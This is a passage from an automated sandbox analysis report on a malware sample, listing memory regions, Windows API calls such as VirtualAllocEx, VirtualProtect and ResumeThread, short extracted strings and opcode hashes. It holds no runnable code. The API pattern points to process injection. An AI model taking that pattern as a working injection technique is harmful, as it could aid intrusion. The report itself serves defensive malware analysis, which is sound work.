                                • Instruction Fuzzy Hash: 3621E4B59002499FDB10DF9AC884BDEFBF4FB48320F10842AE958A7251D379A945CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08F04ABB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 7f2b84f609a5c0b64ec58a33065573500242efd9e53f17068510672bbd86f57b
                                • Instruction ID: 75e1b3f537a4e397facef571b183d7aeacd2c1e25d90f4920486cbe437b01db1
                                • Opcode Fuzzy Hash: 7f2b84f609a5c0b64ec58a33065573500242efd9e53f17068510672bbd86f57b
                                • Instruction Fuzzy Hash: 622106B59002499FDB10CF9AC484BDEFBF4EB48314F108029E558A7651D378A944CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F0DF6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: d21ace5708072f3b3d86d5d5e0f516419b70ef0a3c9c28b3dbcd2fdd5b544364
                                • Instruction ID: 70e7460ef6f6813723207b9954e342240785c58d0d35eb8ef3178e256ba3bd6b
                                • Opcode Fuzzy Hash: d21ace5708072f3b3d86d5d5e0f516419b70ef0a3c9c28b3dbcd2fdd5b544364
                                • Instruction Fuzzy Hash: A51156768003489FDB20DFAAC844BDEBBF5EF48314F108419E519A7250CB759900DFA5
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: c4c32248e9afcb44e07a24154370c8b721dbbcfc003ee9794ec7036f4aef8cac
                                • Instruction ID: c40b755296b2805dc0d3f9342ab53136f5fee6fb1b19ed80ce0dbcc55ecc9825
                                • Opcode Fuzzy Hash: c4c32248e9afcb44e07a24154370c8b721dbbcfc003ee9794ec7036f4aef8cac
                                • Instruction Fuzzy Hash: B01128B5D003488FDB24DFAAC4457DEFBF4EB48224F24841DD519A7240CA79A944CFA5
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 08F0F795
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 002c8af66f202ea02911679b3bd3dbc9a246c758727a902039eb9f1f982f6625
                                • Instruction ID: e3f48a8216428f159200e6fdf01f9da11bad8c2ac43617e67697aaf0732afa5a
                                • Opcode Fuzzy Hash: 002c8af66f202ea02911679b3bd3dbc9a246c758727a902039eb9f1f982f6625
                                • Instruction Fuzzy Hash: D111F5B6800749DFDB20DF9AC485BDEBBF8EB48314F108459E558A7341C375A944CFA5
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 014EAAE6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 3f7d0927befc68621001d9a82b7238049dc226f2f97eba9640536e95a37e8000
                                • Instruction ID: 82b3b7db54d89f97ba6f00166c1accdf0c8c74c23260ec1cb6f1eca0f0fd3312
                                • Opcode Fuzzy Hash: 3f7d0927befc68621001d9a82b7238049dc226f2f97eba9640536e95a37e8000
                                • Instruction Fuzzy Hash: 53110FB6C003498FDB24CF9AC548BDEFBF4EB88214F20841AD419A7310C379A545CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'q
                                • API String ID: 0-1807707664
                                • Opcode ID: bdbc4f75a3a4e47783136045f70c4d9558b300959984bb02b7f22faaadef3cc1
                                • Instruction ID: 2e841ca5944a2ba573d2096eec966935cffa2b6e0efd530681b788eef1de9074
                                • Opcode Fuzzy Hash: bdbc4f75a3a4e47783136045f70c4d9558b300959984bb02b7f22faaadef3cc1
                                • Instruction Fuzzy Hash: 37619F31304116DFEB24DF3DC884B6A7BE9AF8562C7054669E95ACB362DB39DC01CB50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'q
                                • API String ID: 0-1807707664
                                • Opcode ID: 669d0e164c4c0f8a2710f7188a857a50daed7975d614196f86a0695783ebb924
                                • Instruction ID: f88064e5e50254ad03fa072b48e9913f72ccb5a26b322b9023ab8a6196255a9a
                                • Opcode Fuzzy Hash: 669d0e164c4c0f8a2710f7188a857a50daed7975d614196f86a0695783ebb924
                                • Instruction Fuzzy Hash: 7E4137756402458FCB25CF68C848BAE7BB5EF88329F110669E906CB3B1C774DD81CB61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 43q
                                • API String ID: 0-4276051794
                                • Opcode ID: 759d0ed504c45ed994ffe68dba996b54d99b0ed4e7dad637dff066506d1e3bd4
                                • Instruction ID: 7a5112fc57502f9871fa7ffaf6df0e6562b875d063633df92a712deedd664c07
                                • Opcode Fuzzy Hash: 759d0ed504c45ed994ffe68dba996b54d99b0ed4e7dad637dff066506d1e3bd4
                                • Instruction Fuzzy Hash: 42115A6561E3C40FD31797756C242A93F76AF83264F0E45EBD5C1CB1E3C968480AC762
                                APIs
                                • CloseHandle.KERNELBASE(?), ref: 00F41CE0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1906400077.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f40000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 4c507f1f52509febc22b00903944ef9e8eb7957fd2d389c9d9f33bf3574e0e60
                                • Instruction ID: c31d7ca548134aef112c47524835cb0b39dd8eecb31943b42d3a6c6526ed71dd
                                • Opcode Fuzzy Hash: 4c507f1f52509febc22b00903944ef9e8eb7957fd2d389c9d9f33bf3574e0e60
                                • Instruction Fuzzy Hash: 3211E0B68002498FDB20DF9AC585BDEBBF4EB48320F20841AD958A7641D779A944CBA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: Teq
                                • API String ID: 0-1098410595
                                • Opcode ID: ba9408edd866e4fe58b9a65cd8aa9852fdd0e057a40e26c06dfa27d7a500898e
                                • Instruction ID: 3bceb066104ff7e6d4b1a288a77d54d4a613a3b4dcfa10e81ce9b500453ad8c6
                                • Opcode Fuzzy Hash: ba9408edd866e4fe58b9a65cd8aa9852fdd0e057a40e26c06dfa27d7a500898e
                                • Instruction Fuzzy Hash: 75F0F6313001104FC608BB7DA464A7E7BEBAFC96203250069F106CF368CE65DC025396
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 43q
                                • API String ID: 0-4276051794
                                • Opcode ID: baa209f9d31d1d4e6ceef411701663505175f2fc57b5f83e384b8a6f3d9a2f8a
                                • Instruction ID: 39ad55cba62154678750f89a1b28e7beb3701aa4772365b88d37babeb1461b58
                                • Opcode Fuzzy Hash: baa209f9d31d1d4e6ceef411701663505175f2fc57b5f83e384b8a6f3d9a2f8a
                                • Instruction Fuzzy Hash: 41E02235B043800FD3195676A8202BE3B67FBC26A0B0984BFE882CB398DC348C0A4390
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 33ef9431891e761b0562528278f1e3d3537867b628ddbeae0982c7fa340fd42d
                                • Instruction ID: 5f8448e4f26b571309be24b033e470c4a792fa905e31c3fc44be63bf38b3346b
                                • Opcode Fuzzy Hash: 33ef9431891e761b0562528278f1e3d3537867b628ddbeae0982c7fa340fd42d
                                • Instruction Fuzzy Hash: 8E028970E152048FCB14BFB9E99929D7BF1BF88340F5049A9E846E3768DB389D44CB91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4e341a1c49d52b2b9b90e37a5c455059ac1babb8afec45938b93bb771881a18
                                • Instruction ID: e63d197ef224d3269e02104fca194b409417f16567559d6f9a8339ce41bb9928
                                • Opcode Fuzzy Hash: f4e341a1c49d52b2b9b90e37a5c455059ac1babb8afec45938b93bb771881a18
                                • Instruction Fuzzy Hash: 9CE10271B083008FD709BB7DD8A925A7FF1AF85310F4089AEE485D7799DA38D819C792
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d566908612bff31a3e3f9a44d4a513f8a0feb8cc08d75578018d1791ff260d1c
                                • Instruction ID: edb6b2781548a5e7a1b0e3914f8224db9e4da262bcd19069712ef7ec804a80d5
                                • Opcode Fuzzy Hash: d566908612bff31a3e3f9a44d4a513f8a0feb8cc08d75578018d1791ff260d1c
                                • Instruction Fuzzy Hash: 9EE1A032B102008FC708BFBDE99966E7FB2AB84340F918969D945D3798DE38D859C791
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 33fdfe3aaf3241adbbb970e45ac14e5f1d5454386d506d4f158d171b8ec5bd7c
                                • Instruction ID: 9c8712cab43487f43655b2ecdb2b6684e1d7216c5bd84e900fce0a419f32021c
                                • Opcode Fuzzy Hash: 33fdfe3aaf3241adbbb970e45ac14e5f1d5454386d506d4f158d171b8ec5bd7c
                                • Instruction Fuzzy Hash: 59D1D171B052048FDB08BBB9E8992AE7FB6FFC8350F54486AD545A3395DE388C0583A5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42c2a54211258b52d7ed371889dfcded6ced12b76f006a2b8ccb6eb4ec78214b
                                • Instruction ID: c6136c400b9726d6620b131e311b8efb3cf233000197bd262262095389ffbe4e
                                • Opcode Fuzzy Hash: 42c2a54211258b52d7ed371889dfcded6ced12b76f006a2b8ccb6eb4ec78214b
                                • Instruction Fuzzy Hash: 15D12774E152048FCB14AFB9E59929DBBF1FF88340F504569E806E3768EB389D45CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f9c2d3ee0ae2e39d704dc3510e0fe6096a5245ba4e577793a82fba099d03e5f
                                • Instruction ID: 11c9ffb2ef1f10092f263023975f35a2e637c0a41f8a1fd287fae07b77aa30fb
                                • Opcode Fuzzy Hash: 3f9c2d3ee0ae2e39d704dc3510e0fe6096a5245ba4e577793a82fba099d03e5f
                                • Instruction Fuzzy Hash: 22B18271B106048BC704FBBEE99472F7BBAAB98310F504865E809E375CDE78DD1587A1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3718b8a064e50999dcfb74ce4ebaa4af57891c8c3d63accf2176fbf81dd612c0
                                • Instruction ID: 36463c597e8f2c2ac12a77d6096ea82abe43e668043d12c1ce59f7dfad9d4970
                                • Opcode Fuzzy Hash: 3718b8a064e50999dcfb74ce4ebaa4af57891c8c3d63accf2176fbf81dd612c0
                                • Instruction Fuzzy Hash: 45B1B172B102108FC708FFB9E99966E7FF2AB84340F508969D945D3798DE38D84AC791
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6aba8b9b3d923241f39eb1d79e79eb8c3b9a0db5cf60d267e7079f3a87902af
                                • Instruction ID: 58360cd608833dfb13262a1eae61687dec51c42f95477a80f863e492a2066555
                                • Opcode Fuzzy Hash: d6aba8b9b3d923241f39eb1d79e79eb8c3b9a0db5cf60d267e7079f3a87902af
                                • Instruction Fuzzy Hash: 59D10775A002159FCB25CF6CC584AADBBF6FF88314B1A84A9E505EB361CB39EC41CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e8615af142f37ed53eb05a966160c5586af680c31ddbb20e43cd45ea169fd1b
                                • Instruction ID: 80bdb79c46a93ff346991c3dd21f958b285ec915824a478683f066c2ac56b380
                                • Opcode Fuzzy Hash: 8e8615af142f37ed53eb05a966160c5586af680c31ddbb20e43cd45ea169fd1b
                                • Instruction Fuzzy Hash: 9BD1F771E002199FCB25CF68C9849ADBBF2FF89314B1A8499E515EB3A1C739EC41CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c938c535caf54fef11ddca28559e41ff3d7a54a88041220d8c225a92f9fff000
                                • Instruction ID: d0df6bcc7ea262ff10dd6ce96c4e57f76da82e18ed637e47c11dcf84a0b0313f
                                • Opcode Fuzzy Hash: c938c535caf54fef11ddca28559e41ff3d7a54a88041220d8c225a92f9fff000
                                • Instruction Fuzzy Hash: 1B81B130B00205DFEB64DFADC888AA9BBF6FF8A218B148169D506E7365D735D841CB91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5d758c66b03ed68710f4f9c729c826314a87c6d5922a1d66ee0b97d5496b11f
                                • Instruction ID: 3d7bde9fcccce81a07947daf5a92e03e2e3a98545b73e0ff9383499457b6a352
                                • Opcode Fuzzy Hash: e5d758c66b03ed68710f4f9c729c826314a87c6d5922a1d66ee0b97d5496b11f
                                • Instruction Fuzzy Hash: 62712A30700206CFDB25DF2EC894A7D7BE9AF89628B1910A9E901DB371DB79EC41CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca267958db7c26402caee3ecca265ca6d28787c9994c7e60e497ed1d53156914
                                • Instruction ID: 93bbd5b7a9ef6263c96547154e2b2393fcd893f6fef8bf7a27b763defae3a311
                                • Opcode Fuzzy Hash: ca267958db7c26402caee3ecca265ca6d28787c9994c7e60e497ed1d53156914
                                • Instruction Fuzzy Hash: 11D0C939098684CFC3A96BB9EC1E8993F64BF2131570801BBF147C79B7DA2648428B12
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a312b782cdd64a18dc544dc99e24b88367400fe811fcc0702b683eac5561de9c
                                • Instruction ID: 1d7f94bd09801767ab20e34ac70a0f54a55f3688f461f6a91e0c5583e6218f96
                                • Opcode Fuzzy Hash: a312b782cdd64a18dc544dc99e24b88367400fe811fcc0702b683eac5561de9c
                                • Instruction Fuzzy Hash: DBB0923C01410CCFC2A03BBEF80C8283B2CBB20306B400271B00B82C388E2218108B62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0d6ff6e6e3824e6525a2bf68a9d7422aa34144f618d39df07f2a7eda9cc1c15
                                • Instruction ID: 7db84d040f96980c25717d5e7cee4974b401ea3553e4d4981702a189f79d575a
                                • Opcode Fuzzy Hash: c0d6ff6e6e3824e6525a2bf68a9d7422aa34144f618d39df07f2a7eda9cc1c15
                                • Instruction Fuzzy Hash: C041277120021ADFDF259F28C844BAEBBF6FF85308F05842AE8459B299DB3DC801C751
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71e1f57560429487b7deb9aec7e5162fa7d7f7831864cc794f8f8a2d59ee05b5
                                • Instruction ID: 88b083617a36e337c04b5e08c0a77fb5fb2e07fd959f84a68fc1912a84be661a
                                • Opcode Fuzzy Hash: 71e1f57560429487b7deb9aec7e5162fa7d7f7831864cc794f8f8a2d59ee05b5
                                • Instruction Fuzzy Hash: 98516EB550064AEFEB24CF58C588A5AB7F1FFC4364F24CA29E96A97261C330E841CB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4ed89a49fca3b01e087fdde09d95423a0dc926a03f86a1007e7574233d19450a
                                • Instruction ID: 1b2e90c690d6a7a975a33146b43d5dfb2f65512c6038532f6a4a91b02c4732b6
                                • Opcode Fuzzy Hash: 4ed89a49fca3b01e087fdde09d95423a0dc926a03f86a1007e7574233d19450a
                                • Instruction Fuzzy Hash: 09419631304645CFDB2A9F69D8156AA3BF2FF8A315B0940AAE545CB3A2DB38DC01CB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee5e2a8b3cf4f92d6cfcf5a52425881ece0bb7aa32e59578e38ffc01fb2db84a
                                • Instruction ID: e485b1725549abf9c34ecf3c3dac885fd0ce83386c8ec4ed9be4946c0f0d4773
                                • Opcode Fuzzy Hash: ee5e2a8b3cf4f92d6cfcf5a52425881ece0bb7aa32e59578e38ffc01fb2db84a
                                • Instruction Fuzzy Hash: EB51C531A04249DFDF22CFE8C844ADEBFB2EF89318F048155E915AB265D739E815CB60
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8341c4a5597bf2a8b0c4ebcd5abd14605f2c1297fa1e337bb17c2cf542d5ac5f
                                • Instruction ID: e088abad3ceab361a9212d6c75cb0cc1dd418e101e009388dd83269f0b94c78f
                                • Opcode Fuzzy Hash: 8341c4a5597bf2a8b0c4ebcd5abd14605f2c1297fa1e337bb17c2cf542d5ac5f
                                • Instruction Fuzzy Hash: 554111319097849FC326AB78E868259BFB8BF02310F0941DBD095C76A7CA388809C366
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b46746b67dda7188858895d9caa9e0324df17b74f19bdf065b3904badacc974
                                • Instruction ID: ffba56a0e40a1fed273050b7011ce0c8538ea65bb637a1785bc5d2c30fc36540
                                • Opcode Fuzzy Hash: 6b46746b67dda7188858895d9caa9e0324df17b74f19bdf065b3904badacc974
                                • Instruction Fuzzy Hash: 2141F03130460ADFDF169F64D8655AE3BA2FF89324F008069F9469B366CB38CC51CB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0635009cd1f6268e8ce65e83b38b01cb7f5f2d2f5f5e769eb8c777bee10ccda5
                                • Instruction ID: 56a6a7e067724bcdae12adfda1889666430d483a2a3dda03984b0949bb0df290
                                • Opcode Fuzzy Hash: 0635009cd1f6268e8ce65e83b38b01cb7f5f2d2f5f5e769eb8c777bee10ccda5
                                • Instruction Fuzzy Hash: C54144B1D103099FEF10DFA9D848AEEBBF4AB88214F548929D815A7350DB74A9058BA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 69c12f7dbc24134eaa613747bb203420b33c6018dce05ecfef816829e8104d12
                                • Instruction ID: 48f88222cc829e7ad79b225a6a3739bb14c96219945d71ea9ed4a079063eb710
                                • Opcode Fuzzy Hash: 69c12f7dbc24134eaa613747bb203420b33c6018dce05ecfef816829e8104d12
                                • Instruction Fuzzy Hash: 9F31243260D3808FD70A777DEC6925EBFB1EF86250F4544EBD484D76A6DA388818C392
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15a775abf1232ea3b35b2918bfebba79461f6348661d55e9b8609ccf3056de43
                                • Instruction ID: fb5148483e7a56e0c646aec66785f2222fec0e641b17d47cba02321a6d115fd1
                                • Opcode Fuzzy Hash: 15a775abf1232ea3b35b2918bfebba79461f6348661d55e9b8609ccf3056de43
                                • Instruction Fuzzy Hash: 4E418F7090070ADFDB15EFA9C49469DFBF2FF89310F14C659E8596B221EB70A981CB80
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 703009ac0e54c2a209f6af8a7d8a82283b6f171e34f561ad6e3fe599306c15f3
                                • Instruction ID: adae92eac54eb381381625000a665da80cec5f79ea43b2dd6170e977623f7278
                                • Opcode Fuzzy Hash: 703009ac0e54c2a209f6af8a7d8a82283b6f171e34f561ad6e3fe599306c15f3
                                • Instruction Fuzzy Hash: 5C318A3120020ADFDF66AF59D854AAEBBB2FF88315F044029F9058B269C739C861DB91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 493684447f1034dcac690619620dcd081009cc8aadcd63478f31adc3b675fce9
                                • Instruction ID: 357cc2b1e2b9fb400d916e09766f575bd3b008a77b2651610c9520b17da2ffb6
                                • Opcode Fuzzy Hash: 493684447f1034dcac690619620dcd081009cc8aadcd63478f31adc3b675fce9
                                • Instruction Fuzzy Hash: C421B2303042108BDF366A2D88957BD779BEFC962CB544229E502CB7AAEE69DC429741
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e0d5bccc37183c1dca28e7330d5957993d1ee46cd40a514df35c46887bfa693a
                                • Instruction ID: ea9434a70c509bcfc871066033b18522ff1c81ec1a9f776c594ea8f1b71fa3a1
                                • Opcode Fuzzy Hash: e0d5bccc37183c1dca28e7330d5957993d1ee46cd40a514df35c46887bfa693a
                                • Instruction Fuzzy Hash: 27212632B00341AFE7351779880463A7BEAAF85310B14866EE946CB295EF3DC8428740
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbd59aa0162fd5e6cf3b200fb073b7c37759f9076a60fa87dd1e59111adfa42d
